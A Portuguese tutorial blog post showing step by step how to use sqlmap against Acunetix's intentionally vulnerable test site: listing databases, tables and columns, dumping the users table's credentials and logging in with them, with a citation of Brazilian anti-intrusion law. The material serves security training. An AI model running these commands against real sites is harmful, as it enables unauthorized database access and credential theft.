WWW.FLEPS.COM.BR

SQLMAP NA PRÁTICA

By admin at 2019-01-02 • 0 colecionador • 1003 visualizações de página

SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados deste sistema ou site, tais como, extrair a lista de usuários, senhas, privilégios, tabelas e muito mais..

Para mostrar como o SQLMAP funciona iremos utilizar um sistema já vulnerável desenvolvido pela Acunetix.

Site: testphp.vulnweb.com

Como previsto na Lei 12.737/2012 no Art. 154-A.  Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:

Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.

Lei Nº 12.737, de 30 de novembro de 2012.

01 Passo

Para realizar a execução do SQLMAP é necessário utilizar um parâmetro GET exemplo: (www.site.com/index.php?id=1‘), então para isso navegue no site ate encontrar a opção como no exemplo abaixo:

http://testphp.vulnweb.com/listproducts.php?cat=1

[email protected]:~# sqlmap -u  http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

-u : URL, Endereço do site.

–dbs : Lista os banco de dados do site.

sqlmap01

02 Passo

Durante o processo de execução o SQLMAP já detecta que o banco de dados do site é MySQL e você pode ser questionado se deseja pular a verificação para outros tipos de banco de dados ou se você que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim).

sqlmap02

03 Passo

Neste momento o SQLMAP já detectou que o parâmetro cat está vulnerável e você é questionado se deseja realizar outros testes, no momento selecione N (Not/Não).

sqlmap03

04 Passo

Como pode visualizar os banco de dados são exibidos:

[*] acuart
[*] information_schema

sqlmap04

05 Passo

Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart.

[email protected]:~# sqlmap -u  http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs -D acuart –tables

-D : Define o banco de dados que será avaliado.

acuart : Banco de dados do site.

–tables : Lista todas as tabelas do banco de dados informado.

sqlmap05

06 Passo

Como resultado são extraídas 8 tabelas do banco de dados acuart.

+ artists
+ carts
+ categ
+ featured
+ guestbook
+ pictures
+ products
+ users

sqlmap06

07 Passo

Vamos extrair todas as colunas existentes na tabela users.

[email protected]:~# sqlmap -u  http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs -D acuart -T users –columns

-T : Define a tabela que será avaliada.

users : Tabela do banco de dados acuart.

–columns : Lista todas as colunas da tabela users.

sqlmap07

08 Passo

Como resultado são extraídas 8 colunas da tabela users.

+ address
+ cart
+ cc
+ email
+ name
+ pass
+ phone
+ uname

sqlmap08

09 Passo

Neste passo iremos realizar o DUMP ou seja extrair todas as informações cadastradas nas colunas da tabela users.

[email protected]:~# sqlmap -u  http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs -D acuart -T users -C name,pass,uname,email –dump

-C : Define as colunas que será avaliada.

name,pass,uname,email : Lista das colunas da tabela users.

–dump : Extrai todas as informações contidas nas colunas da tabela informada.

sqlmap09

10 Passo

Segue abaixo todos os dados extraídos:

pass: test

name: John Smith

uname: test

email: [email protected]

sqlmap10

11 Passo

Munido das informações extraídas realize o acesso ao sistema:

Site: testphp.vulnweb.com/login.php

Username: test

Password: test

sqlmap11

11 Passo

Login realizado com sucesso, basta confirmar as informações.

sqlmap12



<fonte:http://www.100security.com.br/sqlmap/>

1 Respostas | Última atualização 2019-07-14
2019-07-14   #1

Qual o link do github?

Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: